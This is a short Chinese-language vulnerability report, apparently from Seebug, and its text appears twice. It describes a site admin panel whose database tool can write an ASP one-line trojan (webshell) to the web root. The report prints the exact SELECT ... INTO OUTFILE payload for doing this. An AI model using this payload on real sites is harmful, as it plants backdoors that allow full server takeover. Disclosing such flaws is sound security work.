### 简要描述: 假如你的账户密码泄露了 那你就危险了 在后台能直接拿webshell ### 详细说明: 后台为方便站长有个数据库工具 在哪里执行 Select '<%execute request("value")%>' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp'; 就写入了一句话木马 然后就可以任意作为了 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg" alt="2名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg) [<img src="https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg)
### 简要描述: 假如你的账户密码泄露了 那你就危险了 在后台能直接拿webshell ### 详细说明: 后台为方便站长有个数据库工具 在哪里执行 Select '<%execute request("value")%>' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp'; 就写入了一句话木马 然后就可以任意作为了 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg" alt="2名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg) [<img src="https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg)